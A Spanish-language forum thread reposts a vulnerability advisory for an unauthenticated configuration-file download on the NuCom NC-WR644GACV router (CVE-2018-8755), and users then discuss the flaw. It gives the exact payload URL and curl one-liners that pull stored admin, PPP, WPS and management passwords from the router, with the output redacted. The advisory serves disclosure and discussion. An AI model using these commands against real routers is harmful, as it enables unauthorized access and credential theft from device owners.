Obtener la contrasela de un NuCom NC-WR644GACV

Hola amigos ,hace tiempo no pasaba por aqui, para no abrir nuevo hilo, y solo por dejar si no habeis escuchado de esta brecha, os dejo aqui.
saludos.
Overview

Researchers of NVEL4 Cybersecurity company have discovered that it is
possible to access to the config file bypassing admin authentication and
authorization. The vulnerability has been reported to the vendor. The
vendor has confirmed the vulnerability but not issued to security advisory.

The recommendation to affected users is to update to the latest available
version and change the credentials used, since they could have been
extracted.

Some NuCom routers are exposed to internet.
Product Details

  • Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
  • Vendor: NuCom
  • Model Name: NC-WR644GACV
  • Vulnerable Software Version: <= STA 005
  • Fixed Software Version: STA 006

Vulnerability Details

  • CVE: 2018-8755
  • Name: Unauthenticated Configuration File Download
  • Type: Authentication / Authorization Bypass
  • Description: An unauthorizated user can download config file by
    accessing to the URL directly
  • Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
  • Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

PoC

zerial@home:~$ curl -s “http://vulnerable.hostname/
cgi-bin/config_download.cgi?action=download”|strings|grep -i password
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
PASSWORD HERE]
InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
PASSWORD HERE]
zerial@home:~

Es mejor abrir un hilo nuevo porque es una brecha muy diferente. :wink:
Gracias por reportar la vulnerabilidad; dejo aquí el link hacía la publicación de la brecha :
[list=*]
]NuCom NC-WR644GACV Unauthenticated Configuration File Download by Zerial @ packet storm /]
[/list]
Y una imagen para visualizar la cosa:
https://www.wifi-libre.com/img/members/3/nucom_1.jpg
De aspecto es un poco… …Bruto. Pero si se abre fácilmente y que está bien ventilado (han hecho agujeros, no se han cortado)¿Qué más da?
Las antenas son externas :slight_smile: , se parecen como dos gotas de agua a las antenas de las Alfa (y son buenas) pero están fijadas a la placa (¡mal! :frowning: )
Tiene un puerto USB 3.0.

Hay también una nota en español sobre la vulnerabilidad: Vulnerabilidad en los dispositivos Nucom WR644GACV
La entrada no explica los detalles pero habéis visto que no es complicado: La interfaz de gestión web está mal montada.
Se puede descargar el fichero de configuración sin tener que entrar los credenciales.
Solo hace falta entrar esta URL en la barra de navegación de su navegador y obtendréis el fichero :

http://[hostname]/cgi-bin/config_download.cgi?action=download

(En lugar de hostname ponéis la puerta de enlace)
Los datos sensibles están guardados en texto plano o “cifrados”
Hacer un exploit para sacar los credenciales es de lo más trivial.
Sin buscar complicaciones podemos sacar los credenciales con una linea bash.

curl -s "http://vulnerable.hostname/cgi-bin/config_download.cgi?action=download"|strings|grep -i password

Usamos wget o curl para descargar el fichero y depuramos la salida con grep buscando la palabra “password”
El resultado es… “sorprendente”

[code]InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
PASSWORD HERE]
InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
PASSWORD HERE]
InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
TEXT PASSWORD HERE]
InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
PASSWORD HERE]
zerial@home:~$

*** Sensitive information has been removed and replaced by …][/code]
Podríamos simplificar la salida limitándonos a pillar unicamente la primera ocurrencia visto que la contraseña sale en texto claro en la primera ocurrencia.

curl -s "http://vulnerable.hostname/cgi-bin/config_download.cgi?action=download" | strings | grep -m1 -i password

Lo que no llego a entender es por qué cifran la contraseña con sha256 (robusto) y por otro lado la dejan al lado en texto plano :pam:

Es una brecha muy seria y **Nucom **no ha publicado parches de momento
Será interesante ver como reaccionan.
¿Estamos hablando de gente que montan material barato de china para venderlo o hay algo más?
La primera impresión no es buena porque son brechas muy groseras. El error es humano, pero este error ha sido cometido tantas veces en material barato de los años 2010.
Encontrar este tipo de cagada en un router ac 1200 (como mucho del 2015) da a temer lo peor. :stuck_out_tongue:

Si esta gente conocen su oficio y tiene ética profesional todo esto debería arreglarse rápido, no es nada complicado.
Si son unos sin vergüenzas la brecha quedará abierta.
Por lo menos veremos rápido de que madera están hecho
Qué será será :smiley:

Que interesante :wink: como bien dices sheriff falta saber si serán tan gañanes como para no hacer nada, o se plantean una actualización y tapan la brecha.